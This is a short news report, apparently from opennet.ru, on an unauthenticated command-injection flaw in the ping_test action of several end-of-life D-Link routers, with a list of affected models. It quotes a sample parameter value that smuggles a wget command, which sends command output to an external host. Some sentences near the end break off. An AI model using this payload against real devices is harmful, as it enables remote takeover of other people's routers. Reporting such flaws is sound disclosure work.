In D-Link wireless routers
Interestingly, according to the idea of the firmware developers, the “ping_test” call should be performed only after authentication, but in fact it is called in any case, regardless of entering the web interface. In particular, when accessing the apply_sec.cgi script with the "action=ping_test" parameter passed, the script redirects to the authentication page, but at the same time performs the action associated with ping_test. To execute the code, another vulnerability was used in ping_test itself, which calls the ping utility without proper verification of the correctness of the IP address transmitted for testing. For example, to call the wget utility and send the results of the “echo 1234” command to an external host, just specify the parameter “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$( echo 1234)".
The presence of the vulnerability is officially confirmed in the following models:
- DIR-655 with firmware 3.02b05 or older;
- DIR-866L with firmware 1.03b04 or older;
- DIR-1565 with firmware 1.01 or older;
- DIR-652 (data on the versions of problematic firmware are not provided)
The support time for these models has already expired, so D-Link
Later it turned out that the vulnerability also
Source: opennet.ru